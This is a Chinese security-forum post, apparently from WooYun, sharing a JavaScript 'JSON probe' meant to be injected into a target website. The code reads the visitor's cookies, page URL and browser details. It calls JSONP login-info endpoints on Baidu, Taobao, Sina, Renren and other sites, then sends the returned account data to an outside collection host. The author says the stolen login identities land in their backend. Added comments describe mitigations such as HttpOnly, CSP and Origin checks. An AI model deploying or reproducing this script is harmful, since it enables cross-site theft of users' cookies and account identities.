JSON探针—定位目标网络虚拟信息身份
11月啦，放点东西出来给wooyun的伙伴们分享下。其实这个技术已经很成熟啦，不过还是有不知道的童鞋吧。
BTW看了看我的注册时间,数数手指也有3年近4年的样子啦…也见证了wooyun的成长过程.
从当初的rank榜单top10到现在,感叹,弹指一挥间..不过我相信在wooyun这个平台上的帽子们,无论白帽黑帽,只要是会捉老鼠的都是好帽,所以说,我坚信,大家做一件事情,都不忘初衷…坚持!废话是不是很多?哈哈..
看看下面部分的核心代码,我也就贴部分啦,其实实现起来很Easy,需要一个后端去接收。
它的用处呢,标题大家也看到了,至于能扩展到什么程度,怎么使用,那就看大家的思路啦。。。
// Page-wide error handler. Returning true tells the browser the error was
// handled, so uncaught exceptions raised by this script (for example the
// cross-origin `top.location.href` read or a failed probe below) produce no
// console report. An injected script that installs a swallow-everything
// onerror at the top is itself a useful review signal: it hides its own
// failures from anyone watching the console.
window.onerror = function () {
  return true;
};
// Collection endpoint. Every harvested value is appended, escape()d, to the
// `content=` query parameter of this URL and fetched as an image (GET) — see
// the `new Image().src = http_server + ...` beacons below. Assigned without
// `var`, so it is an implicit global. For detection, the observable artefact
// is an outbound image request to a third-party host whose query string
// carries cookies, page URLs and account data.
http_server = "http://lemon.1nlab.com/index.php?do=api&id=lemon&content=";
// Fingerprint/context record built up below and beaconed from window.onload.
var info = {};
info.browser = function () {
  // Coarse browser family and version parsed from the lowercased UA string.
  // Probe order is significant: webkit, opera, msie, and only then mozilla,
  // which is skipped when the UA contains "compatible" so that IE's
  // "Mozilla/... (compatible; MSIE ...)" is not reported as mozilla.
  // Returns { name, version } with "" / "0" when nothing matches.
  // `ua` is assigned without `var` (implicit global), as in the original.
  ua = navigator.userAgent.toLowerCase();
  var families = [
    /(webkit)[ \/]([\w.]+)/,
    /(opera)(?:.*version)?[ \/]([\w.]+)/,
    /(msie) ([\w.]+)/
  ];
  var hit = null;
  for (var k = 0; k < families.length && !hit; k++) {
    hit = families[k].exec(ua);
  }
  if (!hit && ua.indexOf("compatible") < 0) {
    hit = /(mozilla)(?:.*? rv:([\w.]+))?/.exec(ua);
  }
  hit = hit || [];
  return { name: hit[1] || "", version: hit[2] || "0" };
}();
// Page and session context of the visiting browser. escape() (deprecated) is
// used as the transport encoding, so the receiving side must unescape.
info.url = document.location.href;
info.ua = escape(navigator.userAgent);
info.lang = navigator.language;
info.referrer = document.referrer;
info.location = window.location.href; // same value as info.url
// Reading top.location.href throws when the page is framed cross-origin; the
// exception goes to window.onerror above but still aborts the rest of this
// script, so nothing after this line (including window.onload) is installed.
info.toplocation = top.location.href;
// document.cookie never includes cookies flagged HttpOnly, so that flag on
// session cookies is the direct mitigation for this line.
info.cookie = escape(document.cookie);
info.domain = document.domain;
info.title = document.title;
info.screen = function () {
  // "WIDTHxHEIGHT" of the screen, or "" when self.screen is unavailable.
  if (!self.screen) {
    return "";
  }
  return screen.width + "x" + screen.height;
}();
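info.flash = function () {
  // Best-effort Flash Player version string; "" when nothing is detected.
  // Two paths: the navigator.plugins list (non-IE), otherwise ActiveX
  // constructor probing from version 10 down to 2 (IE).
  var f = "";
  var n = navigator;
  if (n.plugins && n.plugins.length) {
    for (var i = 0; i < n.plugins.length; i++) {
      if (n.plugins[i].name.indexOf('Shockwave Flash') != -1) {
        // Whatever follows "Shockwave Flash " in the plugin description.
        f = n.plugins[i].description.split('Shockwave Flash ')[1];
        break;
      }
    }
  } else if (window.ActiveXObject) {
    for (var v = 10; v >= 2; v--) {
      try {
        // Direct constructor call instead of eval() on a built-up string:
        // same object, no dynamic code evaluation. The version loop variable
        // no longer shadows the plugin loop's `ii` either.
        var fl = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.' + v);
        if (fl) {
          f = v + '.0';
          break;
        }
      } catch (e) {
        // No control registered for this version: try the next lower one.
      }
    }
  }
  return f;
}();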
function inj_script(a, b) {
  // Appends a <script src=a> element to <body> and returns it. When b is
  // given it runs after the script has loaded: IE (window.ActiveXObject
  // present) is detected via onreadystatechange, every other browser via
  // onload. <body> must already exist — getElementsByTagName("body")[0] is
  // dereferenced unconditionally. Because this executes whatever the remote
  // host returns in the page's origin, a Content-Security-Policy script-src
  // that does not allow those hosts is the control that stops it.
  var tag = document.createElement("script");
  tag.src = a;
  if (b) {
    if (window.ActiveXObject) {
      tag.onreadystatechange = function () {
        var state = tag.readyState;
        if (state == 'loaded' || state == 'complete') {
          b();
        }
      };
    } else {
      tag.onload = b;
    }
  }
  document.getElementsByTagName("body")[0].appendChild(tag);
  return tag;
}
function json2str(o) {
  // Ad-hoc serialiser producing a JSON-like string with single quotes:
  // {'key':'value',...}. Strings passed at the top level are returned as-is;
  // inside an object, strings and numbers are single-quoted, nested objects
  // (arrays included, keyed by index) recurse, everything else (null,
  // booleans, undefined) is stringified bare. Enumerates with for-in, so
  // inherited enumerable properties are included, and embedded quotes or
  // backslashes are not escaped — not valid JSON, just a transport format.
  if (typeof o == 'string') return o;
  var quoted = function (v) {
    return "'" + v + "'";
  };
  var encodeValue = function (v) {
    var kind = typeof v;
    if (kind == 'object' && v != null) return json2str(v);
    return (kind == 'string' || kind == 'number') ? quoted(v) : v;
  };
  var body = '';
  for (var key in o) {
    body += (body ? ',' : '') + quoted(key) + ':' + encodeValue(o[key]);
  }
  return '{' + body + '}';
}
// JSONP callbacks, one per probed site. Each script URL injected from
// window.onload names one of these globals in its callback parameter; the
// remote endpoint answers with `<name>({...})`, so the browser calls the
// function with whatever account data that endpoint returns for the
// visitor's own cookies. The object is json2str-serialised, escape()d and
// beaconed to http_server; `content2` tags the originating site. The names
// are dictated by the URLs below (several look like timestamped jQuery/jsonp
// callback names copied from real requests). The root cause on the site side
// is an endpoint that returns account data to any cross-origin JSONP request;
// checking Origin/Referer, or SameSite cookies, closes it.
video_login_callback = function (o) {
  new Image().src = http_server + escape(json2str(o)) + "&content2=baidu";
};
e163_comment = function (o) {
  new Image().src = http_server + escape(json2str(o)) + "&content2=163";
};
sina_1368631232407449 = function (o) {
  new Image().src = http_server + escape(json2str(o)) + "&content2=sina";
};
loginInfoJson = function (o) {
  new Image().src = http_server + escape(json2str(o)) + "&content2=taobao";
};
jsonp1368705676193 = function (o) {
  new Image().src = http_server + escape(json2str(o)) + "&content2=mop";
};
jsonp1368751970360 = function (o) {
  new Image().src = http_server + escape(json2str(o)) + "&content2=dangdang";
};
jQuery1368758656634 = function (o) {
  new Image().src = http_server + escape(json2str(o)) + "&content2=renren";
};
// Driver. On load: beacon the `info` record, then inject one remote script per
// site. Seven of the URLs carry a callback parameter naming one of the
// globals above; the sohu and tianya URLs carry none and are read later via
// globals (`_passport`, `tianya_msg`) that the loaded scripts are presumably
// expected to define — hence the 3 s / 5 s timers. Each try/catch only covers
// synchronous failures of inj_script (element creation / appendChild); a
// script that fails to load or returns something unexpected is not caught
// here, and an undefined `_passport` / `tianya_msg` surfaces as an exception
// inside the timer, which window.onerror then silences.
window.onload = function () {
  new Image().src = http_server + escape(json2str(info)) + "&content2=info%20";
  try {
    inj_script('http://baike.baidu.com/api/login/?callback=video_login_callback');
  }
  catch (e) {}
  try {
    inj_script('http://comment.money.163.com/reply/check.jsp?time=1367240961474&callback=e163_comment');
  }
  catch (e) {}
  try {
    inj_script('http://i.house.sina.com.cn/sso/get_cookie.php?callback=sina_1368631232407449');
  }
  catch (e) {}
  try {
    inj_script('http://i.bendi.taobao.com/userLoginInfo.do?callback=loginInfoJson&t=1368683974713');
  }
  catch (e) {}
  try {
    inj_script('http://passport.mop.com/common/user-info?callback=jsonp1368705676193');
  }
  catch (e) {}
  try {
    inj_script('http://commapi.dangdang.com/api/toolbar_ads_api.php?jsoncallback=jsonp1368751970360');
  }
  catch (e) {}
  try {
    inj_script('http://passport.game.renren.com/user/info?callback=jQuery1368758656634&_=1368758656639');
  }
  catch (e) {}
  try {
    inj_script('http://uis.i.sohu.com/api/passport.jsp?from=roll&_=1361671333278');
  }
  catch (e) {}
  try {
    // The `¶` characters in this URL look like an HTML-entity rendering
    // artefact of the post it was copied from; the string is left as found.
    inj_script('http://www.tianya.cn/api/msg?method=messagesys.selectmessage¶ms.pageSize=1¶ms.pageNo=1&_=1368893252433&var=tianya_msg');
  }
  catch (e) {}
  // `_passport` is not defined in this file; assumed to be set by the sohu
  // script — TODO confirm.
  setTimeout(function () {
    var o = [_passport];
    new Image().src = http_server + escape(json2str(o)) + "&content2=sohu";
  }
  , 3000);
  // `tianya_msg` matches the `var=tianya_msg` parameter in the tianya URL;
  // presumably the response assigns that global. Only the first list entry
  // is read, as "name|id".
  setTimeout(function () {
    var o = tianya_msg.data.list[0].toUserName + '|' + tianya_msg.data.list[0].toUserId;
    new Image().src = http_server + escape(json2str(o)) + "&content2=tianya";
  }
  , 5000);
};
我就不逐行去做解释了,大家可以看到里面有很多国内的大型SNS站点,购物站,等等。
这里你可以自定义添加你想要的，然后呢，你把这段代码注入到目标网站上，那么访问者访问以后，
假设他之前有访问过这些代码里面自定义的网站，比如baidu空间、当当网、新浪微博、淘宝等等网站，
那么他之前的登录信息就会被我们截获到，并且记录到我们的后台，也就是最开始那段http_server那个地址里面去……好了，洗洗睡了。。。欢迎各位拍砖……